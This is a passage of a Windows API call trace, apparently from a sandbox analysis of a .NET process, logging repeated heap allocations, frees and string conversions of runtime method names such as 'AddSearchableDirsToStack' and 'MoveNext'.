0x22b34a3c0c0 [0084.286] HeapFree (in: hHeap=0x22b349a0000, dwFlags=0x0, lpMem=0x22b36a696c0 | out: hHeap=0x22b349a0000) returned 1 [0084.330] HeapFree (in: hHeap=0x22b349a0000, dwFlags=0x0, lpMem=0x22b36a6f6e0 | out: hHeap=0x22b349a0000) returned 1 [0084.344] VirtualAlloc (lpAddress=0x0, dwSize=0x2aec40, flAllocationType=0x1000, flProtect=0x4) returned 0x22b374b0000 [0085.228] MultiByteToWideChar (in: CodePage=0xfde9, dwFlags=0x0, lpMultiByteStr=0x22b34a2f720, cbMultiByte=11, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 11 [0085.228] MultiByteToWideChar (in: CodePage=0xfde9, dwFlags=0x0, lpMultiByteStr=0x22b34a2f720, cbMultiByte=11, lpWideCharStr=0x4c1ec75f58, cchWideChar=11 | out: lpWideCharStr="WinIOError") returned 11 [0085.230] MultiByteToWideChar (in: CodePage=0xfde9, dwFlags=0x0, lpMultiByteStr=0x22b34a2f760, cbMultiByte=23, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 23 [0085.230] MultiByteToWideChar (in: CodePage=0xfde9, dwFlags=0x0, lpMultiByteStr=0x22b34a2f760, cbMultiByte=23, lpWideCharStr=0x4c1ec75f58, cchWideChar=23 | out: lpWideCharStr="(Int32, System.String)") returned 23 [0085.230] HeapFree (in: hHeap=0x22b349a0000, dwFlags=0x0, lpMem=0x22b34a2f760 | out: hHeap=0x22b349a0000) returned 1 [0085.230] HeapFree (in: hHeap=0x22b349a0000, dwFlags=0x0, lpMem=0x22b349e6220 | out: hHeap=0x22b349a0000) returned 1 [0085.230] HeapFree (in: hHeap=0x22b349a0000, dwFlags=0x0, lpMem=0x22b34a2f720 | out: hHeap=0x22b349a0000) returned 1 [0085.232] GetLastError () returned 0xcb [0085.233] SetLastError (dwErrCode=0xcb) [0085.233] GetLastError () returned 0xcb [0085.233] SetLastError (dwErrCode=0xcb) [0085.233] RtlAllocateHeap (HeapHandle=0x22b349a0000, Flags=0x0, Size=0x20) returned 0x22b36a0e710 [0085.234] RtlAllocateHeap (HeapHandle=0x22b349a0000, Flags=0x0, Size=0x20) returned 0x22b36a0dd20 [0085.234] RtlAllocateHeap (HeapHandle=0x22b349a0000, Flags=0x0, Size=0x20) returned 0x22b36a0e0b0 [0085.235] RtlAllocateHeap (HeapHandle=0x22b349a0000, Flags=0x0, Size=0x20) returned 0x22b36a0dd80 [0085.236] RtlAllocateHeap (HeapHandle=0x22b349a0000, Flags=0x0, Size=0x20) returned 0x22b36a0df60 [0085.236] RtlAllocateHeap (HeapHandle=0x22b349a0000, Flags=0x0, Size=0x20) returned 0x22b36a0df90 [0085.236] RtlAllocateHeap (HeapHandle=0x22b349a0000, Flags=0x0, Size=0x20) returned 0x22b36a0dfc0 [0085.236] RtlAllocateHeap (HeapHandle=0x22b349a0000, Flags=0x0, Size=0x20) returned 0x22b36a0ee00 [0085.236] RtlAllocateHeap (HeapHandle=0x22b349a0000, Flags=0x0, Size=0x20) returned 0x22b36a0e9e0 [0085.237] RtlAllocateHeap (HeapHandle=0x22b349a0000, Flags=0x0, Size=0x20) returned 0x22b36a0eaa0 [0085.237] RtlAllocateHeap (HeapHandle=0x22b349a0000, Flags=0x0, Size=0x20) returned 0x22b36a0ed70 [0085.237] RtlAllocateHeap (HeapHandle=0x22b349a0000, Flags=0x0, Size=0x20) returned 0x22b36a0e830 [0085.237] RtlAllocateHeap (HeapHandle=0x22b349a0000, Flags=0x0, Size=0x20) returned 0x22b36a0ece0 [0085.237] RtlAllocateHeap (HeapHandle=0x22b349a0000, Flags=0x0, Size=0x20) returned 0x22b36a0f190 [0085.237] RtlAllocateHeap (HeapHandle=0x22b349a0000, Flags=0x0, Size=0x20) returned 0x22b36a0f340 [0085.238] RtlAllocateHeap (HeapHandle=0x22b349a0000, Flags=0x0, Size=0x20) returned 0x22b36a0ef50 [0085.238] RtlAllocateHeap (HeapHandle=0x22b349a0000, Flags=0x0, Size=0x20) returned 0x22b36a0eb00 [0085.238] RtlAllocateHeap (HeapHandle=0x22b349a0000, Flags=0x0, Size=0x20) returned 0x22b36a0ea70 [0085.238] RtlAllocateHeap (HeapHandle=0x22b349a0000, Flags=0x0, Size=0x20) returned 0x22b36a0ee30 [0085.239] RtlAllocateHeap (HeapHandle=0x22b349a0000, Flags=0x0, Size=0x20) returned 0x22b36a0f130 [0085.239] RtlAllocateHeap (HeapHandle=0x22b349a0000, Flags=0x0, Size=0x20) returned 0x22b36a0ec50 [0085.239] RtlAllocateHeap (HeapHandle=0x22b349a0000, Flags=0x0, Size=0x20) returned 0x22b36a0f070 [0085.239] RtlAllocateHeap (HeapHandle=0x22b349a0000, Flags=0x0, Size=0x20) returned 0x22b36a0e860 [0085.239] RtlAllocateHeap (HeapHandle=0x22b349a0000, Flags=0x0, Size=0x20) returned 0x22b36a0e7d0 [0085.239] RtlAllocateHeap (HeapHandle=0x22b349a0000, Flags=0x0, Size=0x20) returned 0x22b36a0ee60 [0085.240] RtlAllocateHeap (HeapHandle=0x22b349a0000, Flags=0x0, Size=0x20) returned 0x22b36a0f220 [0085.240] RtlAllocateHeap (HeapHandle=0x22b349a0000, Flags=0x0, Size=0x20) returned 0x22b36a0e800 [0085.240] RtlAllocateHeap (HeapHandle=0x22b349a0000, Flags=0x0, Size=0x20) returned 0x22b36a0eda0 [0085.240] RtlAllocateHeap (HeapHandle=0x22b349a0000, Flags=0x0, Size=0x20) returned 0x22b36a0f0a0 [0085.240] RtlAllocateHeap (HeapHandle=0x22b349a0000, Flags=0x0, Size=0x20) returned 0x22b36a0e890 [0085.241] RtlAllocateHeap (HeapHandle=0x22b349a0000, Flags=0x0, Size=0x20) returned 0x22b36a0ee90 [0085.241] RtlAllocateHeap (HeapHandle=0x22b349a0000, Flags=0x0, Size=0x20) returned 0x22b36a0ebf0 [0085.241] RtlAllocateHeap (HeapHandle=0x22b349a0000, Flags=0x0, Size=0x20) returned 0x22b36a0f1f0 [0085.241] RtlAllocateHeap (HeapHandle=0x22b349a0000, Flags=0x0, Size=0x20) returned 0x22b36a0ef80 [0085.241] RtlAllocateHeap (HeapHandle=0x22b349a0000, Flags=0x0, Size=0x20) returned 0x22b36a0efb0 [0085.241] RtlAllocateHeap (HeapHandle=0x22b349a0000, Flags=0x0, Size=0x20) returned 0x22b36a0f1c0 [0085.241] RtlAllocateHeap (HeapHandle=0x22b349a0000, Flags=0x0, Size=0x20) returned 0x22b36a0eec0 [0085.242] RtlAllocateHeap (HeapHandle=0x22b349a0000, Flags=0x0, Size=0x20) returned 0x22b36a0edd0 [0085.242] RtlAllocateHeap (HeapHandle=0x22b349a0000, Flags=0x0, Size=0x20) returned 0x22b36a0e8c0 [0085.242] RtlAllocateHeap (HeapHandle=0x22b349a0000, Flags=0x0, Size=0x20) returned 0x22b36a0e8f0 [0085.242] RtlAllocateHeap (HeapHandle=0x22b349a0000, Flags=0x0, Size=0x20) returned 0x22b36a0f2e0 [0085.242] RtlAllocateHeap (HeapHandle=0x22b349a0000, Flags=0x0, Size=0x20) returned 0x22b36a0f250 [0085.242] RtlAllocateHeap (HeapHandle=0x22b349a0000, Flags=0x0, Size=0x20) returned 0x22b36a0ea10 [0085.242] RtlAllocateHeap (HeapHandle=0x22b349a0000, Flags=0x0, Size=0x19) returned 0x22b36a0e920 [0085.243] MultiByteToWideChar (in: CodePage=0xfde9, dwFlags=0x0, lpMultiByteStr=0x22b36a0e920, cbMultiByte=25, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 25 [0085.243] MultiByteToWideChar (in: CodePage=0xfde9, dwFlags=0x0, lpMultiByteStr=0x22b36a0e920, cbMultiByte=25, lpWideCharStr=0x4c1ec75f58, cchWideChar=25 | out: lpWideCharStr="AddSearchableDirsToStack") returned 25 [0085.243] RtlAllocateHeap (HeapHandle=0x22b349a0000, Flags=0x0, Size=0x100) returned 0x22b349e6220 [0085.243] RtlAllocateHeap (HeapHandle=0x22b349a0000, Flags=0x0, Size=0xd) returned 0x22b34a2f600 [0085.243] MultiByteToWideChar (in: CodePage=0xfde9, dwFlags=0x0, lpMultiByteStr=0x22b34a2f600, cbMultiByte=13, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 13 [0085.243] MultiByteToWideChar (in: CodePage=0xfde9, dwFlags=0x0, lpMultiByteStr=0x22b34a2f600, cbMultiByte=13, lpWideCharStr=0x4c1ec75f58, cchWideChar=13 | out: lpWideCharStr="(SearchData)") returned 13 [0085.243] HeapFree (in: hHeap=0x22b349a0000, dwFlags=0x0, lpMem=0x22b34a2f600 | out: hHeap=0x22b349a0000) returned 1 [0085.243] HeapFree (in: hHeap=0x22b349a0000, dwFlags=0x0, lpMem=0x22b349e6220 | out: hHeap=0x22b349a0000) returned 1 [0085.243] HeapFree (in: hHeap=0x22b349a0000, dwFlags=0x0, lpMem=0x22b36a0e920 | out: hHeap=0x22b349a0000) returned 1 [0085.245] RtlAllocateHeap (HeapHandle=0x22b349a0000, Flags=0x0, Size=0x20) returned 0x22b36a0f280 [0085.245] RtlAllocateHeap (HeapHandle=0x22b349a0000, Flags=0x0, Size=0x20) returned 0x22b36a0f010 [0085.245] RtlAllocateHeap (HeapHandle=0x22b349a0000, Flags=0x0, Size=0x20) returned 0x22b36a0f2b0 [0085.245] RtlAllocateHeap (HeapHandle=0x22b349a0000, Flags=0x0, Size=0x20) returned 0x22b36a0ead0 [0085.245] RtlAllocateHeap (HeapHandle=0x22b349a0000, Flags=0x0, Size=0x20) returned 0x22b36a0f0d0 [0085.273] RtlAllocateHeap (HeapHandle=0x22b349a0000, Flags=0x0, Size=0x20) returned 0x22b36a0ea40 [0085.273] RtlAllocateHeap (HeapHandle=0x22b349a0000, Flags=0x0, Size=0x20) returned 0x22b36a0f310 [0085.273] RtlAllocateHeap (HeapHandle=0x22b349a0000, Flags=0x0, Size=0x20) returned 0x22b36a0f040 [0085.273] RtlAllocateHeap (HeapHandle=0x22b349a0000, Flags=0x0, Size=0x20) returned 0x22b36a0e770 [0085.273] RtlAllocateHeap (HeapHandle=0x22b349a0000, Flags=0x0, Size=0x20) returned 0x22b36a0eb30 [0085.273] RtlAllocateHeap (HeapHandle=0x22b349a0000, Flags=0x0, Size=0x20) returned 0x22b36a0eb90 [0085.274] RtlAllocateHeap (HeapHandle=0x22b349a0000, Flags=0x0, Size=0x20) returned 0x22b36a0ed10 [0085.274] RtlAllocateHeap (HeapHandle=0x22b349a0000, Flags=0x0, Size=0x20) returned 0x22b36a0eef0 [0085.274] GetLastError () returned 0xcb [0085.274] SetLastError (dwErrCode=0xcb) [0085.274] GetLastError () returned 0xcb [0085.274] SetLastError (dwErrCode=0xcb) [0085.274] RtlAllocateHeap (HeapHandle=0x22b349a0000, Flags=0x0, Size=0x20) returned 0x22b36a0ef20 [0085.275] RtlAllocateHeap (HeapHandle=0x22b349a0000, Flags=0x0, Size=0x20) returned 0x22b36a0e7a0 [0085.275] RtlAllocateHeap (HeapHandle=0x22b349a0000, Flags=0x0, Size=0x20) returned 0x22b36a0ec80 [0085.275] RtlAllocateHeap (HeapHandle=0x22b349a0000, Flags=0x0, Size=0x20) returned 0x22b36a0e920 [0085.276] RtlAllocateHeap (HeapHandle=0x22b349a0000, Flags=0x0, Size=0x20) returned 0x22b36a0efe0 [0085.276] RtlAllocateHeap (HeapHandle=0x22b349a0000, Flags=0x0, Size=0x20) returned 0x22b36a0f100 [0085.276] RtlAllocateHeap (HeapHandle=0x22b349a0000, Flags=0x0, Size=0x20) returned 0x22b36a0e950 [0085.276] RtlAllocateHeap (HeapHandle=0x22b349a0000, Flags=0x0, Size=0x20) returned 0x22b36a0eb60 [0085.276] RtlAllocateHeap (HeapHandle=0x22b349a0000, Flags=0x0, Size=0x20) returned 0x22b36a0f160 [0085.276] RtlAllocateHeap (HeapHandle=0x22b349a0000, Flags=0x0, Size=0x20) returned 0x22b36a0e980 [0085.276] RtlAllocateHeap (HeapHandle=0x22b349a0000, Flags=0x0, Size=0x20) returned 0x22b36a0e9b0 [0085.276] RtlAllocateHeap (HeapHandle=0x22b349a0000, Flags=0x0, Size=0x20) returned 0x22b36a0ebc0 [0085.277] RtlAllocateHeap (HeapHandle=0x22b349a0000, Flags=0x0, Size=0x20) returned 0x22b36a0ec20 [0085.277] RtlAllocateHeap (HeapHandle=0x22b349a0000, Flags=0x0, Size=0x9) returned 0x22b34a2fcc0 [0085.277] MultiByteToWideChar (in: CodePage=0xfde9, dwFlags=0x0, lpMultiByteStr=0x22b34a2fcc0, cbMultiByte=9, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 9 [0085.277] MultiByteToWideChar (in: CodePage=0xfde9, dwFlags=0x0, lpMultiByteStr=0x22b34a2fcc0, cbMultiByte=9, lpWideCharStr=0x4c1ec75f58, cchWideChar=9 | out: lpWideCharStr="MoveNext") returned 9 [0085.277] RtlAllocateHeap (HeapHandle=0x22b349a0000, Flags=0x0, Size=0x100) returned 0x22b349e6aa0 [0085.277] RtlAllocateHeap (HeapHandle=0x22b349a0000, Flags=0x0, Size=0x3) returned 0x22b349f4c40 [0085.277] MultiByteToWideChar (in: CodePage=0xfde9, dwFlags=0x0, lpMultiByteStr=0x22b349f4c40, cbMultiByte=3, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 3 [0085.277] MultiByteToWideChar (in: CodePage=0xfde9, dwFlags=0x0, lpMultiByteStr=0x22b349f4c40, cbMultiByte=3, lpWideCharStr=0x4c1ec75f58, cchWideChar=3 | out: lpWideCharStr="()") returned 3 [0085.277] HeapFree (in: hHeap=0x22b349a0000, dwFlags=0x0, lpMem=0x22b349f4c40 | out: hHeap=0x22b349a0000) returned 1 [0085.277] HeapFree (in: hHeap=0x22b349a0000, dwFlags=0x0, lpMem=0x22b349e6aa0 | out: hHeap=0x22b349a0000) returned 1 [0085.277] HeapFree (in: hHeap=0x22b349a0000, dwFlags=0x0, lpMem=0x22b34a2fcc0 | out: hHeap=0x22b349a0000) returned 1 [0085.279] RtlAllocateHeap (HeapHandle=0x22b349a0000, Flags=0x0, Size=0x20) returned 0x22b36a0ecb0 [0085.279] RtlAllocateHeap (HeapHandle=0x22b349a0000, Flags=0x0, Size=0x20) returned 0x22b36a0ed40 [0085.279] RtlAllocateHeap (HeapHandle=0x22b349a0000, Flags=0x0, Size=0x20) returned 0x22b36a0f3a0 [0085.279] RtlAllocateHeap (HeapHandle=0x22b349a0000, Flags=0x0, Size=0x20) returned 0x22b36a0fa00 [0085.279] RtlAllocateHeap (HeapHandle=0x22b349a0000, Flags=0x0, Size=0x20) returned 0x22b36a0f4f0 [0085.279] RtlAllocateHeap (HeapHandle=0x22b349a0000, Flags=0x0, Size=0x20) returned 0x22b36a0f430 [0085.279] RtlAllocateHeap (HeapHandle=0x22b349a0000, Flags=0x0, Size=0x20) returned 0x22b36a0f880 [0085.280] RtlAllocateHeap (HeapHandle=0x22b349a0000, Flags=0x0, Size=0x20) returned 0x22b36a0f8b0 [0085.280] RtlAllocateHeap (HeapHandle=0x22b349a0000, Flags=0x0, Size=0x20) returned 0x22b36a0f610 [0085.280] RtlAllocateHeap (HeapHandle=0x22b349a0000, Flags=0x0, Size=0x20) returned 0x22b36a0f640 [0085.280] RtlAllocateHeap (HeapHandle=0x22b349a0000, Flags=0x0, Size=0x20) returned 0x22b36a0f9a0 [0085.280] RtlAllocateHeap (HeapHandle=0x22b349a0000, Flags=0x0, Size=0x20) returned 0x22b36a0f460 [0085.280] RtlAllocateHeap (HeapHandle=0x22b349a0000, Flags=0x0, Size=0x20) returned 0x22b36a0f490 [0085.280] GetLastError () returned 0xcb [0085.280] SetLastError (dwErrCode=0xcb) [0085.280] GetLastError () returned 0xcb [0085.280] SetLastError (dwErrCode=0xcb) [0085.280] RtlAllocateHeap (HeapHandle=0x22b349a0000, Flags=0x0, Size=0x20) returned 0x22b36a0f730 [0085.282] RtlAllocateHeap (HeapHandle=0x22b349a0000, Flags=0x0, Size=0x20) returned 0x22b36a0f4c0 [0085.282] RtlAllocateHeap (HeapHandle=0x22b349a0000, Flags=0x0, Size=0x20) returned 0x22b36a0f3d0 [0085.282] RtlAllocateHeap (HeapHandle=0x22b349a0000, Flags=0x0, Size=0x20) returned 0x22b36a0f8e0 [0085.282] RtlAllocateHeap (HeapHandle=0x22b349a0000, Flags=0x0, Size=0x20) returned 0x22b36a0f760 [0085.283] RtlAllocateHeap (HeapHandle=0x22b349a0000, Flags=0x0, Size=0x20) returned 0x22b36a0f940 [0085.283] RtlAllocateHeap (HeapHandle=0x22b349a0000, Flags=0x0, Size=0x20) returned 0x22b36a0f670 [0085.283] RtlAllocateHeap (HeapHandle=0x22b349a0000, Flags=0x0, Size=0x20) returned 0x22b36a0f6a0 [0085.283] RtlAllocateHeap (HeapHandle=0x22b349a0000, Flags=0x0, Size=0x20) returned 0x22b36a0f700 [0085.283] RtlAllocateHeap (HeapHandle=0x22b349a0000, Flags=0x0, Size=0x20) returned 0x22b36a0fa90 [0085.284] RtlAllocateHeap (HeapHandle=0x22b349a0000, Flags=0x0, Size=0x20) returned 0x22b36a0f520 [0085.284] RtlAllocateHeap (HeapHandle=0x22b349a0000, Flags=0x0, Size=0x20) returned 0x22b36a0f910 [0085.284] RtlAllocateHeap (HeapHandle=0x22b349a0000, Flags=0x0, Size=0x20) returned 0x22b36a0f550 [0085.284] RtlAllocateHeap (HeapHandle=0x22b349a0000, Flags=0x0, Size=0x20) returned 0x22b36a0f6d0 [0085.284] RtlAllocateHeap (HeapHandle=0x22b349a0000, Flags=0x0, Size=0x20) returned 0x22b36a0f580 [0085.285] RtlAllocateHeap (HeapHandle=0x22b349a0000, Flags=0x0, Size=0x20) returned 0x22b36a0fa30 [0085.285] RtlAllocateHeap (HeapHandle=0x22b349a0000, Flags=0x0, Size=0x20) returned 0x22b36a0f5b0 [0085.285] RtlAllocateHeap (HeapHandle=0x22b349a0000, Flags=0x0, Size=0x20) returned 0x22b36a0f7c0 [0085.285] RtlAllocateHeap (HeapHandle=0x22b349a0000, Flags=0x0, Size=0x20) returned 0x22b36a0f5e0 [0085.285] RtlAllocateHeap (HeapHandle=0x22b349a0000, Flags=0x0, Size=0x20) returned 0x22b36a0f790 [0085.285] RtlAllocateHeap (HeapHandle=0x22b349a0000, Flags=0x0, Size=0x20) returned 0x22b36a0f850 [0085.285] RtlAllocateHeap (HeapHandle=0x22b349a0000, Flags=0x0, Size=0x20) returned 0x22b36a0f7f0 [0085.286] RtlAllocateHeap (HeapHandle=0x22b349a0000, Flags=0x0, Size=0x20) returned 0x22b36a0f970 [0085.286] RtlAllocateHeap (HeapHandle=0x22b349a0000, Flags=0x0, Size=0x20) returned 0x22b36a0f9d0 [0085.286] RtlAllocateHeap (HeapHandle=0x22b349a0000, Flags=0x0, Size=0x20) returned 0x22b36a0f820 [0085.286] RtlAllocateHeap (HeapHandle=0x22b349a0000, Flags=0x0, Size=0x20) returned 0x22b36a0fa60 [0085.286] RtlAllocateHeap (HeapHandle=0x22b349a0000, Flags=0x0, Size=0x20) returned 0x22b36a0f370 [0085.286] RtlAllocateHeap (HeapHandle=0x22b349a0000, Flags=0x0, Size=0x20) returned 0x22b36a0f400 [0085.286] RtlAllocateHeap (HeapHandle=0x22b349a0000, Flags=0x0, Size=0x20) returned 0x22b36a08740 [0085.286] RtlAllocateHeap (HeapHandle=0x22b349a0000, Flags=0x0, Size=0x20) returned 0x22b36a08500 [0085.287] RtlAllocateHeap (HeapHandle=0x22b349a0000, Flags=0x0, Size=0x20) returned 0x22b36a07db0 [0085.287] RtlAllocateHeap (HeapHandle=0x22b349a0000, Flags=0x0, Size=0x20) returned 0x22b36a08650 [0085.287] RtlAllocateHeap (HeapHandle=0x22b349a0000, Flags=0x0, Size=0x20) returned 0x22b36a084a0 [0085.287] RtlAllocateHeap (HeapHandle=0x22b349a0000, Flags=0x0, Size=0x20) returned 0x22b36a086e0 [0085.287] RtlAllocateHeap (HeapHandle=0x22b349a0000, Flags=0x0, Size=0x20) returned 0x22b36a07fc0 [0085.287] RtlAllocateHeap (HeapHandle=0x22b349a0000, Flags=0x0, Size=0x20) returned 0x22b36a08230 [0085.287] RtlAllocateHeap (HeapHandle=0x22b349a0000, Flags=0x0, Size=0x20) returned 0x22b36a083b0 [0085.288] RtlAllocateHeap (HeapHandle=0x22b349a0000, Flags=0x0, Size=0x20) returned 0x22b36a07f90 [0085.288] RtlAllocateHeap (HeapHandle=0x22b349a0000, Flags=0x0, Size=0x20) returned 0x22b36a08080 [0085.288] RtlAllocateHeap (HeapHandle=0x22b349a0000, Flags=0x0, Size=0x20) returned 0x22b36a07f00 [0085.288] RtlAllocateHeap (HeapHandle=0x22b349a0000, Flags=0x0, Size=0x20) returned 0x22b36a07de0 [0085.288] RtlAllocateHeap (HeapHandle=0x22b349a0000, Flags=0x0, Size=0x20) returned 0x22b36a080b0 [0085.288] RtlAllocateHeap (HeapHandle=0x22b349a0000, Flags=0x0, Size=0x20) returned 0x22b36a080e0 [0085.288] RtlAllocateHeap (HeapHandle=0x22b349a0000, Flags=0x0, Size=0x20) returned 0x22b36a07cf0 [0085.288] RtlAllocateHeap (HeapHandle=0x22b349a0000, Flags=0x0, Size=0x20) returned 0x22b36a08710 [0085.289] RtlAllocateHeap (HeapHandle=0x22b349a0000, Flags=0x0, Size=0x20) returned 0x22b36a083e0 [0085.289] RtlAllocateHeap (HeapHandle=0x22b349a0000, Flags=0x0, Size=0x20) returned 0x22b36a08200 [0085.289] RtlAllocateHeap (HeapHandle=0x22b349a0000, Flags=0x0, Size=0x20) returned 0x22b36a081d0 [0085.289] RtlAllocateHeap (HeapHandle=0x22b349a0000, Flags=0x0, Size=0x20) returned 0x22b36a08410 [0085.289] RtlAllocateHeap (HeapHandle=0x22b349a0000, Flags=0x0, Size=0x20) returned 0x22b36a07b70 [0085.289] RtlAllocateHeap (HeapHandle=0x22b349a0000, Flags=0x0, Size=0x20) returned 0x22b36a07f30 [0085.289] RtlAllocateHeap (HeapHandle=0x22b349a0000, Flags=0x0, Size=0x20) returned 0x22b36a07c60 [0085.289] RtlAllocateHeap (HeapHandle=0x22b349a0000, Flags=0x0, Size=0x20) returned 0x22b36a081a0 [0085.290] RtlAllocateHeap (HeapHandle=0x22b349a0000, Flags=0x0, Size=0x20) returned 0x22b36a08350 [0085.290] RtlAllocateHeap (HeapHandle=0x22b349a0000, Flags=0x0, Size=0x20) returned 0x22b36a082f0 [0085.290] RtlAllocateHeap (HeapHandle=0x22b349a0000, Flags=0x0, Size=0x20) returned 0x22b36a08260 [0085.290] RtlAllocateHeap (HeapHandle=0x22b349a0000, Flags=0x0, Size=0x20) returned 0x22b36a082c0 [0085.290] RtlAllocateHeap (HeapHandle=0x22b349a0000, Flags=0x0, Size=0x20) returned 0x22b36a085f0 [0085.290] RtlAllocateHeap (HeapHandle=0x22b349a0000, Flags=0x0, Size=0x20) returned 0x22b36a08290 [0085.290] RtlAllocateHeap (HeapHandle=0x22b349a0000, Flags=0x0, Size=0x20) returned 0x22b36a07ff0 [0085.290] RtlAllocateHeap (HeapHandle=0x22b349a0000, Flags=0x0, Size=0x20) returned 0x22b36a08680 [0085.291] RtlAllocateHeap (HeapHandle=0x22b349a0000, Flags=0x0, Size=0x20) returned 0x22b36a07ba0 [0085.291] RtlAllocateHeap (HeapHandle=0x22b349a0000, Flags=0x0, Size=0x20) returned 0x22b36a08440 [0085.291] RtlAllocateHeap (HeapHandle=0x22b349a0000, Flags=0x0, Size=0x20) returned 0x22b36a07d50 [0085.291] RtlAllocateHeap (HeapHandle=0x22b349a0000, Flags=0x0, Size=0x20) returned 0x22b36a08110 [0085.291] RtlAllocateHeap (HeapHandle=0x22b349a0000, Flags=0x0, Size=0x20) returned 0x22b36a08320 [0085.291] RtlAllocateHeap (HeapHandle=0x22b349a0000, Flags=0x0, Size=0x20) returned 0x22b36a08530 [0085.291] RtlAllocateHeap (HeapHandle=0x22b349a0000, Flags=0x0, Size=0x20) returned 0x22b36a08620 [0085.291] RtlAllocateHeap (HeapHandle=0x22b349a0000, Flags=0x0, Size=0x20) returned 0x22b36a08380 [0085.292] RtlAllocateHeap (HeapHandle=0x22b349a0000, Flags=0x0, Size=0x20) returned 0x22b36a07bd0 [0085.292] RtlAllocateHeap (HeapHandle=0x22b349a0000, Flags=0x0, Size=0x20) returned 0x22b36a08020 [0085.292] RtlAllocateHeap (HeapHandle=0x22b349a0000, Flags=0x0, Size=0x20) returned 0x22b36a07d20 [0085.292] RtlAllocateHeap (HeapHandle=0x22b349a0000, Flags=0x0, Size=0x20) returned 0x22b36a08140 [0085.292] RtlAllocateHeap (HeapHandle=0x22b349a0000, Flags=0x0, Size=0x20) returned 0x22b36a07c00 [0085.292] RtlAllocateHeap (HeapHandle=0x22b349a0000, Flags=0x0, Size=0x20) returned 0x22b36a07e70 [0085.293] RtlAllocateHeap (HeapHandle=0x22b349a0000, Flags=0x0, Size=0x20) returned 0x22b36a07d80 [0085.293] RtlAllocateHeap (HeapHandle=0x22b349a0000, Flags=0x0, Size=0x20) returned 0x22b36a07c30 [0085.293] RtlAllocateHeap (HeapHandle=0x22b349a0000, Flags=0x0, Size=0x20) returned 0x22b36a07f60 [0085.293] RtlAllocateHeap (HeapHandle=0x22b349a0000, Flags=0x0, Size=0x20) returned 0x22b36a08560 [0085.293] RtlAllocateHeap (HeapHandle=0x22b349a0000, Flags=0x0, Size=0x20) returned 0x22b36a08470 [0085.293] RtlAllocateHeap (HeapHandle=0x22b349a0000, Flags=0x0, Size=0x20) returned 0x22b36a084d0 [0085.293] RtlAllocateHeap (HeapHandle=0x22b349a0000, Flags=0x0, Size=0x20) returned 0x22b36a07ea0 [0085.293] RtlAllocateHeap (HeapHandle=0x22b349a0000, Flags=0x0, Size=0x20) returned 0x22b36a08590 [0085.294] RtlAllocateHeap (HeapHandle=0x22b349a0000, Flags=0x0, Size=0x20) returned 0x22b36a086b0 [0085.294] RtlAllocateHeap (HeapHandle=0x22b349a0000, Flags=0x0, Size=0x20) returned 0x22b36a085c0 [0085.294] RtlAllocateHeap (HeapHandle=0x22b349a0000, Flags=0x0, Size=0x20) returned 0x22b36a07c90 [0085.294] RtlAllocateHeap (HeapHandle=0x22b349a0000, Flags=0x0, Size=0x20) returned 0x22b36a07e40 [0085.294] RtlAllocateHeap (HeapHandle=0x22b349a0000, Flags=0x0, Size=0x20) returned 0x22b36a07cc0 [0085.294] RtlAllocateHeap (HeapHandle=0x22b349a0000, Flags=0x0, Size=0x20) returned 0x22b36a08050 [0085.294] RtlAllocateHeap (HeapHandle=0x22b349a0000, Flags=0x0, Size=0x20) returned 0x22b36a07e10 [0085.294] RtlAllocateHeap (HeapHandle=0x22b349a0000, Flags=0x0, Size=0x20) returned 0x22b36a08170 [0085.295] RtlAllocateHeap (HeapHandle=0x22b349a0000, Flags=0x0, Size=0x20) returned 0x22b36a07ed0 [0085.295] RtlAllocateHeap (HeapHandle=0x22b349a0000, Flags=0x0, Size=0x20) returned 0x22b34a7e170 [0085.295] RtlAllocateHeap (HeapHandle=0x22b349a0000, Flags=0x0, Size=0x20) returned 0x22b34a7d6f0 [0085.295] RtlAllocateHeap (HeapHandle=0x22b349a0000, Flags=0x0, Size=0x20) returned 0x22b34a7d930 [0085.295] RtlAllocateHeap (HeapHandle=0x22b349a0000, Flags=0x0, Size=0x6) returned 0x22b349f4bf0 [0085.295] MultiByteToWideChar (in: CodePage=0xfde9, dwFlags=0x0, lpMultiByteStr=0x22b349f4bf0, cbMultiByte=6, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 6 [0085.296] MultiByteToWideChar (in: CodePage=0xfde9, dwFlags=0x0, lpMultiByteStr=0x22b349f4bf0, cbMultiByte=6, lpWideCharStr=0x4c1ec75f58, cchWideChar=6 | out: lpWideCharStr=".ctor") returned 6 [0085.296] RtlAllocateHeap (HeapHandle=0x22b349a0000, Flags=0x0, Size=0x100) returned 0x22b349e5ef0 [0085.296] RtlAllocateHeap (HeapHandle=0x22b349a0000, Flags=0x0, Size=0x3b) returned 0x22b34a41350 [0085.296] MultiByteToWideChar (in: CodePage=0xfde9, dwFlags=0x0, lpMultiByteStr=0x22b34a41350, cbMultiByte=59, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 59 [0085.296] MultiByteToWideChar (in: CodePage=0xfde9, dwFlags=0x0, lpMultiByteStr=0x22b34a41350, cbMultiByte=59, lpWideCharStr=0x4c1ec75f58, cchWideChar=59 | out: lpWideCharStr="(System.Collections.Generic.IEnumerable`1)") returned 59 [0085.296] HeapFree (in: hHeap=0x22b349a0000, dwFlags=0x0, lpMem=0x22b34a41350 | out: hHeap=0x22b349a0000) returned 1 [0085.296] HeapFree (in: hHeap=0x22b349a0000, dwFlags=0x0, lpMem=0x22b349e5ef0 | out: hHeap=0x22b349a0000) returned 1 [0085.296] HeapFree (in: hHeap=0x22b349a0000, dwFlags=0x0, lpMem=0x22b349f4bf0 | out: hHeap=0x22b349a0000) returned 1 [0085.298] RtlAllocateHeap (HeapHandle=0x22b349a0000, Flags=0x0, Size=0x20) returned 0x22b34a7d780 [0085.298] RtlAllocateHeap (HeapHandle=0x22b349a0000, Flags=0x0, Size=0x20) returned 0x22b34a7e1d0 [0085.298] RtlAllocateHeap (HeapHandle=0x22b349a0000, Flags=0x0, Size=0x20) returned 0x22b34a7d840 [0085.298] RtlAllocateHeap (HeapHandle=0x22b349a0000, Flags=0x0, Size=0x20) returned 0x22b34a7d870 [0085.298] RtlAllocateHeap 